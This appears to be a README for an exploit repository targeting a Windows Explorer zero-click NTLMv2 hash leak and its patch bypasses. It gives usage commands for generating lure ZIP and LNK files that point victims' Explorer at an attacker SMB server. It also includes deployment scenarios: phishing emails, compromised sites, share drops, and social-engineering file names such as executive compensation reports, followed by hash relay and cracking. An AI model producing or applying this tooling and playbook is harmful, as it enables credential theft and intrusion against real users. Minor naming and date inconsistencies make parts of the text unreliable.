Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure# Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure
### 🎥 Demonstration POC + March 2025 Patch bypass
[](https://www.youtube.com/watch?v=_NJ3jqU-wdk)
<div>
### 🎥 patch bypass
[](https://www.youtube.com/watch?v=Btib3LBvpq8)
</div>
> *Click the image above to watch the vulnerability demonstration*
<h2>📋 Technical Overview</h2>
This repository provides a comprehensive research framework analyzing the vulnerability chain in Windows Shell file format processing that leads to NTLMv2-SSP credential disclosure. The toolkit implements two distinct attack vectors that exploit automatic UNC path resolution during file preview operations in Windows Explorer.
### Core Vulnerability Mechanism
The fundamental security issue resides in Windows Shell's automatic processing of embedded UNC paths within specific file formats during preview operations. When users open ZIP archives containing specially crafted files, Windows Explorer automatically resolves UNC paths without user consent, initiating SMB authentication attempts and exposing NTLMv2-SSP hashes to attacker-controlled servers.
### Attack Surface Components
- **File Format Parsing**: Windows Shell automatic processing of XML-based shell files and LNK shortcut properties
- **ZIP Container Bypass**: Archive preview functionality that circumvents Mark-of-the-Web (MOTW) protections
- **Authentication Trigger**: Automatic UNC resolution during metadata extraction and icon fetching operations
## 🏗️ Architecture Evolution
### 🔰 Phase 1: SearchConnector-based Disclosure (CVE-2025-24054)
**File:** `ntlm-disclosure-poc.py`
This initial implementation exploits Windows Search Connector (.searchConnector-ms) files, which are XML-based configuration files that define search locations for Windows Explorer. The vulnerability triggers when Windows automatically processes the embedded UNC path in the `simpleLocation` element during ZIP archive preview operations.
**Technical Characteristics:**
- XML-based payload structure following Microsoft schema specifications
- UNC path embedding in `searchConnectorDescription` elements
- Automatic processing by Windows Search Indexer and Explorer shell
- Bypasses traditional file execution restrictions
### 🔰 Phase 2: LNK-in-ZIP Bypass (CVE-2025-50154 / CVE-2025-59214)
**File:** `patch_bypass.ps1`
This enhanced technique addresses Microsoft's initial patch by leveraging LNK file properties. The attack exploits Windows Explorer's behavior of fetching icon metadata and resolving target paths during ZIP file preview, while maintaining the zero-click exploitation vector through careful property configuration.
**Technical Characteristics:**
- LNK files with UNC paths in `TargetPath` property
- Local icon references to bypass initial detection mechanisms
- Windows Shell automatic property extraction during preview
- Maintains file format legitimacy while achieving UNC resolution
### 🔧 Prerequisites
<details>
<summary>For Python PoC:</summary>
* Python `3.6+`
* Required packages: `colorama`
</details>
<details>
<summary>For PowerShell PoC:</summary>
* Windows PowerShell `5.1+`
* Execution Policy: `Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser`
</details>
<hr>
### 🔰 Phase 1: Python Implementation (CVE-2025-24054)
```bash
# Basic usage
python ntml-disclosure-poc.py 192.168.1.100
# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip
# Example output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip
Parameters
target (required): Target IP address or hostname
-o, --output: Custom output filename for ZIP package
```
### 🔰 Phase 2: PowerShell Bypass (CVE-2025-50154/59214)
```
# Basic usage - LNK file auto-removed
.\bypass.ps1 -IP 192.168.1.100
# Keep LNK file for external distribution
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk
# Custom lure name and share
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName" -KeepLnk
# Specify output directory
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk
Parameters
-IP (required): Target SMB server IP address
-Share: SMB share name (default: 'share')
-File: Target filename (default: 'payload.exe')
-Lure: Social engineering filename (default: 'Your_File_For_Payload_Here')
-OutDir: Output directory (default: current directory)
-KeepLnk: Preserve LNK file after ZIP creation
```
<table>
<thead>
<tr>
<th><span>Vector</span></th>
<th><span>Trigger Mechanism</span></th>
<th><span>User Interaction</span></th>
<th><span>Patch Status</span></th>
</tr>
</thead>
<tbody>
<tr><td><strong><span>🔗 SearchConnector</span></strong></td>
<td><span>XML parsing + UNC resolution</span></td>
<td><span>ZIP open</span></td><td><span>🛡️ Patched</span></td></tr><tr>
<td><strong><span>📎 LNK TargetPath</span></strong></td>
<td><span>Icon metadata fetch</span></td>
<td><span>ZIP open</span></td
><td><span>🔴 Active</span></td></tr></tbody></table>
```mermaid
graph TD
A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
C --> D[🛡️ Microsoft Patch]
D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
E --> F[🔴 Current State<br/>Active Exploitation]
style A fill:#ffcccc
style C fill:#ffddcc
style E fill:#ffffcc
style F fill:#ccffcc
```
### 🔧 Technical Specifications
1. 📦 Payload Generation
- Create malicious file (SearchConnector/LNK) with UNC path
- Package in ZIP archive with enticing name
2. 📤 Delivery
- Distribute ZIP via email/web/download
3. 💥 Exploitation
- Victim opens ZIP in Windows Explorer
- Automatic file preview triggers UNC resolution
- NTLMv2-SSP hash transmitted to attacker
4. 🎭 Post-Exploitation
- Hash capture and relay attacks
- Password cracking attempts
<hr>
### 💀 Deployment Scenarios
<b>📨 Scenario 1: Direct ZIP Distribution</b>
```
# Create ZIP payload
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"
# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments
```
<b>🔄 Scenario 2: LNK File Transfer</b>
```
# Create and preserve LNK file for multi-host deployment
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk
# Cross-host deployment:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites
```
<b>🎯 Scenario 3: Targeted Social Engineering</b>
```
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
```
<h2 align="center">Contact the Developer</h2>
```
- Group & Contact: t.me/initial_persistence
- Email: tylerblackout17@gmail.com
```
[4.0K] /data/pocs/f7dadd080be0ef8e5fbb5423d9e21112174d6157
├── [ 12K] ntml-disclosure-poc.py
├── [4.3K] patch_bypass.ps1
└── [7.0K] README.md
1 directory, 3 files